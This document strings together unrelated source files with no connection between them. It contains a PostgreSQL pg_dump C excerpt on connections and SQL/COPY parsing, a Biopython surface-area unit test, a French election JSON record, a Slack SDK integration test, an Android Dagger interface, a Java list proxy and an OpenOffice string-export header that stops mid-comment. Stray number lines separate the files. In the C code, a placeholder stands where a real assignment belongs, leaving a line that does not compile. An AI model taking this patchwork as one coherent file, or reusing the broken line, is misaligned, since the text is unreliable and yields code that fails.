"fallback_application_name"; values[5] = progname; keywords[6] = NULL; values[6] = NULL; new_pass = false; newConn = PQconnectdbParams(keywords, values, true); free(keywords); free(values); if (!newConn) die_horribly(AH, modulename, "failed to reconnect to database\n"); if (PQstatus(newConn) == CONNECTION_BAD) { if (!PQconnectionNeedsPassword(newConn)) die_horribly(AH, modulename, "could not reconnect to database: %s", PQerrorMessage(newConn)); PQfinish(newConn); if (password) fprintf(stderr, "Password incorrect\n"); fprintf(stderr, "Connecting to %s as %s\n", newdb, newuser); if (password) free(password); if (AH->promptPassword != TRI_NO) password = simple_prompt("Password: ", 100, false); else die_horribly(AH, modulename, "connection needs password\n"); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); new_pass = true; } } while (new_pass); AH->savedPassword = password; /* check for version mismatch */ _check_database_version(AH); PQsetNoticeProcessor(newConn, notice_processor, NULL); return newConn; } /* * Make a database connection with the given parameters. The * connection handle is returned, the parameters are stored in AHX. * An interactive password prompt is automatically issued if required. * * Note: it's not really all that sensible to use a single-entry password * cache if the username keeps changing. In current usage, however, the * username never does change, so one savedPassword is sufficient. */ PGconn * ConnectDatabase(Archive *AHX, const char *dbname, const char *pghost, const char *pgport, const char *username, enum trivalue prompt_password) { ArchiveHandle *AH = (ArchiveHandle *) AHX; char *password = AH->savedPassword; bool new_pass; if (AH->connection) die_horribly(AH, modulename, "already connected to a database\n"); if (prompt_password == TRI_YES && password == NULL) { password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); } AH->promptPassword = <PASSWORD>; /* * Start the connection. Loop until we have a password if requested by * backend. 
*/ do { #define PARAMS_ARRAY_SIZE 7 const char **keywords = malloc(PARAMS_ARRAY_SIZE * sizeof(*keywords)); const char **values = malloc(PARAMS_ARRAY_SIZE * sizeof(*values)); if (!keywords || !values) die_horribly(AH, modulename, "out of memory\n"); keywords[0] = "host"; values[0] = pghost; keywords[1] = "port"; values[1] = pgport; keywords[2] = "user"; values[2] = username; keywords[3] = "password"; values[3] = password; keywords[4] = "dbname"; values[4] = dbname; keywords[5] = "fallback_application_name"; values[5] = progname; keywords[6] = NULL; values[6] = NULL; new_pass = false; AH->connection = PQconnectdbParams(keywords, values, true); free(keywords); free(values); if (!AH->connection) die_horribly(AH, modulename, "failed to connect to database\n"); if (PQstatus(AH->connection) == CONNECTION_BAD && PQconnectionNeedsPassword(AH->connection) && password == NULL && prompt_password != TRI_NO) { PQfinish(AH->connection); password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); new_pass = true; } } while (new_pass); AH->savedPassword = password; /* check to see that the backend connection was successfully made */ if (PQstatus(AH->connection) == CONNECTION_BAD) die_horribly(AH, modulename, "connection to database \"%s\" failed: %s", PQdb(AH->connection), PQerrorMessage(AH->connection)); /* check for version mismatch */ _check_database_version(AH); PQsetNoticeProcessor(AH->connection, notice_processor, NULL); return AH->connection; } static void notice_processor(void *arg __attribute__((unused)), const char *message) { write_msg(NULL, "%s", message); } /* Public interface */ /* Convenience function to send a query. Monitors result to handle COPY statements */ static void ExecuteSqlCommand(ArchiveHandle *AH, const char *qry, const char *desc) { PGconn *conn = AH->connection; PGresult *res; char errStmt[DB_MAX_ERR_STMT]; #ifdef NOT_USED fprintf(stderr, "Executing: '%s'\n\n", qry); #endif res = PQexec(conn, qry); switch (PQresultStatus(res)) { case PGRES_COMMAND_OK: case PGRES_TUPLES_OK: /* A-OK */ break; case PGRES_COPY_IN: /* Assume this is an expected result */ AH->pgCopyIn = true; break; default: /* trouble */ strncpy(errStmt, qry, DB_MAX_ERR_STMT); if (errStmt[DB_MAX_ERR_STMT - 1] != '\0') { errStmt[DB_MAX_ERR_STMT - 4] = '.'; errStmt[DB_MAX_ERR_STMT - 3] = '.'; errStmt[DB_MAX_ERR_STMT - 2] = '.'; errStmt[DB_MAX_ERR_STMT - 1] = '\0'; } warn_or_die_horribly(AH, modulename, "%s: %s Command was: %s\n", desc, PQerrorMessage(conn), errStmt); break; } PQclear(res); } /* * Used by ExecuteSqlCommandBuf to send one buffered line when running a COPY command. */ static char * _sendCopyLine(ArchiveHandle *AH, char *qry, char *eos) { size_t loc; /* Location of next newline */ int pos = 0; /* Current position */ int sPos = 0; /* Last pos of a slash char */ int isEnd = 0; /* loop to find unquoted newline ending the line of COPY data */ for (;;) { loc = strcspn(&qry[pos], "\n") + pos; /* If no match, then wait */ if (loc >= (eos - qry)) /* None found */ { appendBinaryPQExpBuffer(AH->pgCopyBuf, qry, (eos - qry)); return eos; } /* * fprintf(stderr, "Found cr at %d, prev char was %c, next was %c\n", * loc, qry[loc-1], qry[loc+1]); */ /* Count the number of preceding slashes */ sPos = loc; while (sPos > 0 && qry[sPos - 1] == '\\') sPos--; sPos = loc - sPos; /* * If an odd number of preceding slashes, then \n was escaped so set * the next search pos, and loop (if any left). 
*/ if ((sPos & 1) == 1) { /* fprintf(stderr, "cr was escaped\n"); */ pos = loc + 1; if (pos >= (eos - qry)) { appendBinaryPQExpBuffer(AH->pgCopyBuf, qry, (eos - qry)); return eos; } } else break; } /* We found an unquoted newline */ qry[loc] = '\0'; appendPQExpBuffer(AH->pgCopyBuf, "%s\n", qry); isEnd = (strcmp(AH->pgCopyBuf->data, "\\.\n") == 0); /* * Note that we drop the data on the floor if libpq has failed to enter * COPY mode; this allows us to behave reasonably when trying to continue * after an error in a COPY command. */ if (AH->pgCopyIn && PQputCopyData(AH->connection, AH->pgCopyBuf->data, AH->pgCopyBuf->len) <= 0) die_horribly(AH, modulename, "error returned by PQputCopyData: %s", PQerrorMessage(AH->connection)); resetPQExpBuffer(AH->pgCopyBuf); if (isEnd && AH->pgCopyIn) { PGresult *res; if (PQputCopyEnd(AH->connection, NULL) <= 0) die_horribly(AH, modulename, "error returned by PQputCopyEnd: %s", PQerrorMessage(AH->connection)); /* Check command status and return to normal libpq state */ res = PQgetResult(AH->connection); if (PQresultStatus(res) != PGRES_COMMAND_OK) warn_or_die_horribly(AH, modulename, "COPY failed: %s", PQerrorMessage(AH->connection)); PQclear(res); AH->pgCopyIn = false; } return qry + loc + 1; } /* * Used by ExecuteSqlCommandBuf to send one buffered line of SQL * (not data for the copy command). */ static char * _sendSQLLine(ArchiveHandle *AH, char *qry, char *eos) { /* * The following is a mini state machine to assess the end of an SQL * statement. It really only needs to parse good SQL, or at least that's * the theory... End-of-statement is assumed to be an unquoted, * un-commented semi-colon that's not within any parentheses. * * Note: the input can be split into bufferloads at arbitrary boundaries. * Therefore all state must be kept in AH->sqlparse, not in local * variables of this routine. We assume that AH->sqlparse was filled with * zeroes when created. */ for (; qry < eos; qry++) { switch (AH->sqlparse.state) { case SQL_SCAN: /* Default state == 0, set in _allocAH */ if (*qry == ';' && AH->sqlparse.braceDepth == 0) { /* * We've found the end of a statement. Send it and reset * the buffer. */ appendPQExpBufferChar(AH->sqlBuf, ';'); /* inessential */ ExecuteSqlCommand(AH, AH->sqlBuf->data, "could not execute query"); resetPQExpBuffer(AH->sqlBuf); AH->sqlparse.lastChar = '\0'; /* * Remove any following newlines - so that embedded COPY * commands don't get a starting newline. */ qry++; while (qry < eos && *qry == '\n') qry++; /* We've finished one line, so exit */ return qry; } else if (*qry == '\'') { if (AH->sqlparse.lastChar == 'E') AH->sqlparse.state = SQL_IN_E_QUOTE; else AH->sqlparse.state = SQL_IN_SINGLE_QUOTE; AH->sqlparse.backSlash = false; } else if (*qry == '"') { AH->sqlparse.state = SQL_IN_DOUBLE_QUOTE; } /* * Look for dollar-quotes. We make the assumption that * $-quotes will not have an ident character just before them * in pg_dump output. XXX is this good enough? 
*/ else if (*qry == '$' && !_isIdentChar(AH->sqlparse.lastChar)) { AH->sqlparse.state = SQL_IN_DOLLAR_TAG; /* initialize separate buffer with possible tag */ if (AH->sqlparse.tagBuf == NULL) AH->sqlparse.tagBuf = createPQExpBuffer(); else resetPQExpBuffer(AH->sqlparse.tagBuf); appendPQExpBufferChar(AH->sqlparse.tagBuf, *qry); } else if (*qry == '-' && AH->sqlparse.lastChar == '-') AH->sqlparse.state = SQL_IN_SQL_COMMENT; else if (*qry == '*' && AH->sqlparse.lastChar == '/') AH->sqlparse.state = SQL_IN_EXT_COMMENT; else if (*qry == '(') AH->sqlparse.braceDepth++; else if (*qry == ')') AH->sqlparse.braceDepth--; break; case SQL_IN_SQL_COMMENT: if (*qry == '\n') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_EXT_COMMENT: /* * This isn't fully correct, because we don't account for * nested slash-stars, but pg_dump never emits such. */ if (AH->sqlparse.lastChar == '*' && *qry == '/') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_SINGLE_QUOTE: /* We needn't handle '' specially */ if (*qry == '\'' && !AH->sqlparse.backSlash) AH->sqlparse.state = SQL_SCAN; else if (*qry == '\\') AH->sqlparse.backSlash = !AH->sqlparse.backSlash; else AH->sqlparse.backSlash = false; break; case SQL_IN_E_QUOTE: /* * Eventually we will need to handle '' specially, because * after E'...''... we should still be in E_QUOTE state. * * XXX problem: how do we tell whether the dump was made by a * version that thinks backslashes aren't special in non-E * literals?? */ if (*qry == '\'' && !AH->sqlparse.backSlash) AH->sqlparse.state = SQL_SCAN; else if (*qry == '\\') AH->sqlparse.backSlash = !AH->sqlparse.backSlash; else AH->sqlparse.backSlash = false; break; case SQL_IN_DOUBLE_QUOTE: /* We needn't handle "" specially */ if (*qry == '"') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_DOLLAR_TAG: if (*qry == '$') { /* Do not add the closing $ to tagBuf */ AH->sqlparse.state = SQL_IN_DOLLAR_QUOTE; AH->sqlparse.minTagEndPos = AH->sqlBuf->len + AH->sqlparse.tagBuf->len + 1; } else if (_isDQChar(*qry, (AH->sqlparse.tagBuf->len == 1))) { /* Valid, so add to tag */ appendPQExpBufferChar(AH->sqlparse.tagBuf, *qry); } else { /* * Ooops, we're not really in a dollar-tag. Valid tag * chars do not include the various chars we look for in * this state machine, so it's safe to just jump from this * state back to SCAN. We have to back up the qry pointer * so that the current character gets rescanned in SCAN * state; and then "continue" so that the bottom-of-loop * actions aren't done yet. */ AH->sqlparse.state = SQL_SCAN; qry--; continue; } break; case SQL_IN_DOLLAR_QUOTE: /* * If we are at a $, see whether what precedes it matches * tagBuf. (Remember that the trailing $ of the tag was not * added to tagBuf.) However, don't compare until we have * enough data to be a possible match --- this is needed to * avoid false match on '$a$a$...' */ if (*qry == '$' && AH->sqlBuf->len >= AH->sqlparse.minTagEndPos && strcmp(AH->sqlparse.tagBuf->data, AH->sqlBuf->data + AH->sqlBuf->len - AH->sqlparse.tagBuf->len) == 0) AH->sqlparse.state = SQL_SCAN; break; } appendPQExpBufferChar(AH->sqlBuf, *qry); AH->sqlparse.lastChar = *qry; } /* * If we get here, we've processed entire bufferload with no complete SQL * stmt */ return eos; } /* Convenience function to send one or more queries. 
Monitors result to handle COPY statements */ int ExecuteSqlCommandBuf(ArchiveHandle *AH, void *qryv, size_t bufLen) { char *qry = (char *) qryv; char *eos = qry + bufLen; /* * fprintf(stderr, "\n\n*****\n Buffer:\n\n%s\n*******************\n\n", * qry); */ /* Could switch between command and COPY IN mode at each line */ while (qry < eos) { /* * If libpq is in CopyIn mode *or* if the archive structure shows we * are sending COPY data, treat the data as COPY data. The pgCopyIn * check is only needed for backwards compatibility with ancient * archive files that might just issue a COPY command without marking * it properly. Note that in an archive entry that has a copyStmt, * all data up to the end of the entry will go to _sendCopyLine, and * therefore will be dropped if libpq has failed to enter COPY mode. * Also, if a "\." data terminator is found, anything remaining in the * archive entry will be dropped. */ if (AH->pgCopyIn || AH->writingCopyData) qry = _sendCopyLine(AH, qry, eos); else qry = _sendSQLLine(AH, qry, eos); } return 1; } void StartTransaction(ArchiveHandle *AH) { ExecuteSqlCommand(AH, "BEGIN", "could not start database transaction"); } void CommitTransaction(ArchiveHandle *AH) { ExecuteSqlCommand(AH, "COMMIT", "could not commit database transaction"); } static bool _isIdentChar(unsigned char c) { if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || (c == '_') || (c == '$') || (c >= (unsigned char) '\200') /* no need to check <= \377 */ ) return true; else return false; } static bool _isDQChar(unsigned char c, bool atStart) { if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') || (!atStart && c >= '0' && c <= '9') || (c >= (unsigned char) '\200') /* no need to check <= \377 */ ) return true; else return false; }
7,866
2,856
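The comment in _sendSQLLine above describes a mini state machine that looks for an unquoted, uncommented semicolon outside parentheses, keeping all state in AH->sqlparse because input arrives in arbitrary bufferloads. A heavily reduced Python sketch of the same splitting idea; it handles only single quotes, double quotes, '--' comments and parentheses, and omits the dollar-quote and E'' escape states of the C code:

def split_sql(buf: str):
    """Yield complete statements from a buffer; a reduced model of _sendSQLLine.
    Any trailing partial statement is simply left unconsumed, as in the C code."""
    state, depth, stmt = "SCAN", 0, []
    for i, ch in enumerate(buf):
        stmt.append(ch)
        if state == "SCAN":
            if ch == ";" and depth == 0:
                yield "".join(stmt).strip()
                stmt = []
            elif ch == "'":
                state = "SQUOTE"
            elif ch == '"':
                state = "DQUOTE"
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "-" and i + 1 < len(buf) and buf[i + 1] == "-":
                state = "COMMENT"
        elif state == "SQUOTE" and ch == "'":
            state = "SCAN"
        elif state == "DQUOTE" and ch == '"':
            state = "SCAN"
        elif state == "COMMENT" and ch == "\n":
            state = "SCAN"

print(list(split_sql("INSERT INTO t VALUES ('a;b'); -- trailing; comment\nSELECT 1;")))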
# Copyright 2020 <NAME>. All rights reserved. # # This file is part of the Biopython distribution and governed by your # choice of the "Biopython License Agreement" or the "BSD 3-Clause License". # Please see the LICENSE file that should have been included as part of this # package. """Unit tests for the Bio.PDB.SASA module: Surface Accessibility Calculations.""" import copy import pathlib import unittest import warnings from Bio.PDB import PDBParser from Bio.PDB.SASA import ShrakeRupley DATADIR = pathlib.Path(__file__).parent / "PDB" class TestShrakeRupley(unittest.TestCase): """Tests for SR algorithm.""" # Expected values obtained with freesasa 2.0.3 and custom config file. # e.g. cmd: --shrake-rupley --resolution 100 -n-threads 1 --probe-radius 1.4 @classmethod def setUpClass(cls): """One-time setup for all tests.""" cls.parser = p = PDBParser(QUIET=1) with warnings.catch_warnings(): structure = p.get_structure("X", DATADIR / "1LCD.pdb") model = structure[0] # Remove HETATM and Hs for simplicity/speed for r in list(model.get_residues()): if r.id[0] == " ": for a in list(r): if a.element == "H": r.detach_child(a.name) else: c = r.parent c.detach_child(r.id) cls.model = model # General Parameters def test_default_algorithm(self): """Run Shrake-Rupley with default parameters.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [50.36, 31.40, 10.87, 12.86, 2.42] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) def test_higher_resolution(self): """Run Shrake-Rupley with 960 points per sphere.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley(n_points=960) sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [51.90, 31.45, 12.45, 12.72, 3.02] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) def test_custom_radii(self): """Run Shrake-Rupley with custom radii.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley(radii_dict={"C": 5.00}) sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [0.0, 190.45, 41.18, 0.0, 36.03] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) # Compute parameters def test_level_R(self): """Run Shrake-Rupley with level R.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m, level="R") for r in m.get_residues(): atom_sum = sum(a.sasa for a in r) self.assertAlmostEqual(atom_sum, r.sasa, places=2) def test_level_C(self): """Run Shrake-Rupley with level C.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m, level="C") for c in m.get_chains(): atom_sum = sum(a.sasa for a in c.get_atoms()) self.assertAlmostEqual(atom_sum, c.sasa, places=2) # Exceptions def test_fail_probe_radius(self): """Raise exception on bad probe_radius parameter.""" with self.assertRaisesRegex(ValueError, "must be a positive number"): sasa = ShrakeRupley(probe_radius=-1.40) def test_fail_n_points(self): """Raise exception on bad n_points parameter.""" with self.assertRaisesRegex(ValueError, "must be larger than 1"): sasa = ShrakeRupley(n_points=0) def test_fail_compute_entity_type(self): """Raise exception on unsupported entity type.""" with self.assertRaisesRegex(ValueError, "Invalid entity type"): sasa = ShrakeRupley() sasa.compute([1, 2, 3, 4, 5]) def test_fail_compute_entity_level(self): """Raise exception on input Atom entity.""" atom = list(self.model.get_atoms())[0] with 
self.assertRaisesRegex(ValueError, "Invalid entity type"): sasa = ShrakeRupley() sasa.compute(atom) def test_fail_compute_level_1(self): """Raise exception on invalid level parameter: X.""" with self.assertRaisesRegex(ValueError, "Invalid level"): sasa = ShrakeRupley() sasa.compute(self.model, level="X") def test_fail_compute_level_2(self): """Raise exception on invalid level parameter: S > C.""" chain = self.model["A"] with self.assertRaisesRegex(ValueError, "be equal or smaller than"): sasa = ShrakeRupley() sasa.compute(chain, level="S") # Chain is a child of Structure. def test_fail_empty_entity(self): """Raise exception on invalid level parameter: S > C.""" sasa = ShrakeRupley() r = copy.deepcopy(self.model["A"].child_list[0]) for a in list(r): r.detach_child(a.name) # empty residue self.assertEqual(len(r.child_list), 0) with self.assertRaisesRegex(ValueError, "Entity has no child atoms"): sasa.compute(r) if __name__ == "__main__": runner = unittest.TextTestRunner(verbosity=2) unittest.main(testRunner=runner)
2,559
348
{"nom":"Champigneulles-en-Bassigny","dpt":"Haute-Marne","inscrits":44,"abs":11,"votants":33,"blancs":4,"nuls":0,"exp":29,"res":[{"panneau":"1","voix":21},{"panneau":"2","voix":8}]}
78
2,486
import logging import os import unittest import pytest from integration_tests.env_variable_names import ( SLACK_SDK_TEST_GRID_ORG_ADMIN_USER_TOKEN, ) from integration_tests.helpers import async_test, is_not_specified from slack_sdk.http_retry import RateLimitErrorRetryHandler from slack_sdk.http_retry.builtin_async_handlers import AsyncRateLimitErrorRetryHandler from slack_sdk.web import WebClient from slack_sdk.web.async_client import AsyncWebClient class TestWebClient(unittest.TestCase): """Runs integration tests with real Slack API""" def setUp(self): self.logger = logging.getLogger(__name__) self.org_admin_token = os.environ[SLACK_SDK_TEST_GRID_ORG_ADMIN_USER_TOKEN] self.sync_client: WebClient = WebClient(token=self.org_admin_token) self.sync_client.retry_handlers.append( RateLimitErrorRetryHandler(max_retry_count=2) ) self.async_client: AsyncWebClient = AsyncWebClient(token=self.org_admin_token) self.async_client.retry_handlers.append( AsyncRateLimitErrorRetryHandler(max_retry_count=2) ) def tearDown(self): pass @pytest.mark.skipif(condition=is_not_specified(), reason="execution can take long") def test_sync(self): client = self.sync_client for response in client.admin_users_session_list(limit=1): self.assertIsNotNone(response.get("active_sessions")) @pytest.mark.skipif(condition=is_not_specified(), reason="execution can take long") @async_test async def test_async(self): client = self.async_client async for response in await client.admin_users_session_list(limit=1): self.assertIsNotNone(response.get("active_sessions"))
693
1,213
import pytest

pytest.importorskip("channels")
17
314
package com.ys.yoosir.zzshow.di.component;

import com.ys.yoosir.zzshow.di.module.VideoListModule;
import com.ys.yoosir.zzshow.di.scope.FragmentScope;
import com.ys.yoosir.zzshow.mvp.ui.fragments.VideoListFragment;

import dagger.Component;

/**
 * @version 1.1.0
 * @author yoosir
 * Created by Administrator on 2016/12/29 0029.
 */
@FragmentScope
@Component(modules = VideoListModule.class, dependencies = AppComponent.class)
public interface VideoListComponent {

    void inject(VideoListFragment fragment);
}
187
1,367
package com.wanjian.sak.proxy; import android.support.annotation.NonNull; import java.lang.reflect.Method; import java.util.ArrayList; import java.util.Collection; import java.util.Iterator; import java.util.List; import java.util.ListIterator; public class ProxyArrayList<E> extends ArrayList<E> { private ArrayList origin; private Method removeRangeMethod; public ProxyArrayList(ArrayList origin) { super(); this.origin = origin; if (origin == null) { throw new IllegalArgumentException("origin can not be null!"); } } @Override public boolean add(E object) { return origin.add(object); } @Override public void add(int index, E object) { origin.add(index, object); } @Override public boolean addAll(Collection<? extends E> collection) { return origin.addAll(collection); } @Override public boolean addAll(int index, Collection<? extends E> collection) { return origin.addAll(index, collection); } @Override public void clear() { origin.clear(); } @Override public Object clone() { return origin.clone(); } @Override public void ensureCapacity(int minimumCapacity) { origin.ensureCapacity(minimumCapacity); } @Override public E get(int index) { return (E) origin.get(index); } @Override public int size() { return origin.size(); } @Override public boolean isEmpty() { return origin.isEmpty(); } @Override public boolean contains(Object object) { return origin.contains(object); } @Override public int indexOf(Object object) { return origin.indexOf(object); } @Override public int lastIndexOf(Object object) { return origin.lastIndexOf(object); } @Override public E remove(int index) { return (E) origin.remove(index); } @Override public boolean remove(Object object) { return origin.remove(object); } @Override public E set(int index, E object) { return (E) origin.set(index, object); } @Override public Object[] toArray() { return origin.toArray(); } @Override public <T> T[] toArray(T[] contents) { return (T[]) origin.toArray(contents); } @Override public void trimToSize() { origin.trimToSize(); } @NonNull @Override public Iterator<E> iterator() { return origin.iterator(); } @Override public int hashCode() { return origin.hashCode(); } @Override public boolean equals(Object o) { return origin.equals(o); } @Override public ListIterator<E> listIterator() { return origin.listIterator(); } @Override public ListIterator<E> listIterator(int location) { return origin.listIterator(location); } @Override public List<E> subList(int start, int end) { return origin.subList(start, end); } @Override public boolean containsAll(Collection<?> collection) { return origin.containsAll(collection); } @Override public boolean removeAll(Collection<?> collection) { return origin.removeAll(collection); } @Override public boolean retainAll(Collection<?> collection) { return origin.retainAll(collection); } @Override public String toString() { return origin.toString(); } @Override protected void removeRange(int fromIndex, int toIndex) { if (removeRangeMethod == null) { try { removeRangeMethod = ArrayList.class.getDeclaredMethod("removeRange", int.class, int.class); } catch (NoSuchMethodException e) { throw new RuntimeException(e); } } try { removeRangeMethod.invoke(origin, fromIndex, toIndex); } catch (Exception e) { throw new RuntimeException(e); } } }
1,632
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef SC_XESTRING_HXX #define SC_XESTRING_HXX #include "xlstring.hxx" // ============================================================================ class ScEditCell; class ScPatternAttr; class EditTextObject; class XclExpStream; class XclExpXmlStream; /** This class stores an unformatted or formatted string for Excel export. The class supports two completely different types of Excel strings: 1) BIFF2-BIFF7 byte strings: The text is encoded as a 8-bit character array. The strings cannot contain any character formatting. 2) BIFF8 Unicode strings: The text may be stored as UCS-2 character array, or compressed to an 8-bit array, if all characters are less than U+0100. Unicode strings may contain a formatting array, that specifies the used FONT record for different ranges of characters. The class provides full support for NUL characters in strings. On construction or assignment the passed flags specify the behaviour of the string while it is written to a stream (the 'Write' functions and 'operator<<'). */ class XclExpString { public: // constructors ----------------------------------------------------------- /** Constructs an empty BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Constructs an unformatted BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( const String& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Constructs an unformatted BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( const ::rtl::OUString& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 /** Constructs a formatted BIFF8 Unicode string. //UNUSED2008-05 @param rFormats The formatting runs. //UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string. */ //UNUSED2008-05 explicit XclExpString( //UNUSED2008-05 const String& rString, //UNUSED2008-05 const XclFormatRunVec& rFormats, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 //UNUSED2008-05 /** Constructs a formatted BIFF8 Unicode string. //UNUSED2008-05 @param rFormats The formatting runs. 
//UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string. */ //UNUSED2008-05 explicit XclExpString( //UNUSED2008-05 const ::rtl::OUString& rString, //UNUSED2008-05 const XclFormatRunVec& rFormats, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); // assign ----------------------------------------------------------------- /** Assigns an unformatted string, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const String& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a formatted string, converts this object to a BIFF8 Unicode string. @param rFormats The formatting runs. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const String& rString, const XclFormatRunVec& rFormats, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns an unformatted string, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const ::rtl::OUString& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a formatted string, converts this object to a BIFF8 Unicode string. @param rFormats The formatting runs. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const ::rtl::OUString& rString, const XclFormatRunVec& rFormats, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a Unicode character, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string (for appending). */ void Assign( sal_Unicode cChar, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns an unformatted string, converts this object to a BIFF2-BIFF7 byte string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void AssignByte( const String& rString, rtl_TextEncoding eTextEnc, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 /** Assigns a character, converts this object to a BIFF2-BIFF7 byte string. //UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string (for appending). */ //UNUSED2008-05 void AssignByte( //UNUSED2008-05 sal_Unicode cChar, //UNUSED2008-05 rtl_TextEncoding eTextEnc, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); // append ----------------------------------------------------------------- /** Appends a string. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF8 Unicode string. */ void Append( const String& rString ); //UNUSED2008-05 /** Appends a string. Uses the string flags used in constructor or last Assign(). //UNUSED2008-05 @descr This object must be a BIFF8 Unicode string. 
*/ //UNUSED2008-05 void Append( const ::rtl::OUString& rString ); //UNUSED2008-05 /** Appends a character. Uses the string flags used in constructor or last Assign(). //UNUSED2008-05 @descr This object must be a BIFF8 Unicode string. */ //UNUSED2008-05 void Append( sal_Unicode cChar ); /** Appends a string. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF2-BIFF7 byte string. */ void AppendByte( const String& rString, rtl_TextEncoding eTextEnc ); /** Appends a character. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF2-BIFF7 byte string. */ void AppendByte( sal_Unicode cChar, rtl_TextEncoding eTextEnc ); // formatting runs -------------------------------------------------------- /** Sets new formatting runs for the current text. */ void SetFormats( const XclFormatRunVec& rFormats ); /** Appends a formatting run. nChar must be greater than last contained character index. */ void AppendFormat( sal_uInt16 nChar, sal_uInt16 nFontIdx, bool bDropDuplicate = true ); /** Appends a trailing formatting run with the passed font index. */ void AppendTrailingFormat( sal_uInt16 nFontIdx ); /** Removes formatting runs at the end, if the string contains too much. */ void LimitFormatCount( sal_uInt16 nMaxCount ); /** Removes and returns the font index for the first char from the formatting runs, otherwise EXC_FONT_NOTFOUND. */ sal_uInt16 RemoveLeadingFont(); // get data --------------------------------------------------------------- /** Returns the character count of the string. */ inline sal_uInt16 Len() const { return mnLen; } /** Returns true, if the string is empty. */ inline bool IsEmpty() const { return mnLen == 0; } /** Returns true, if the string contains line breaks. */ inline bool IsWrapped() const { return mbWrapped; } /** Returns true, if this string is equal to the passed string. */ bool IsEqual( const XclExpString& rCmp ) const; /** Returns true, if this string is less than the passed string. */ bool IsLessThan( const XclExpString& rCmp ) const; /** Returns true, if the string contains formatting information. */ inline bool IsRich() const { return !maFormats.empty(); } /** Returns the current count of formatting runs for rich strings. */ sal_uInt16 GetFormatsCount() const; /** Returns the vector with all 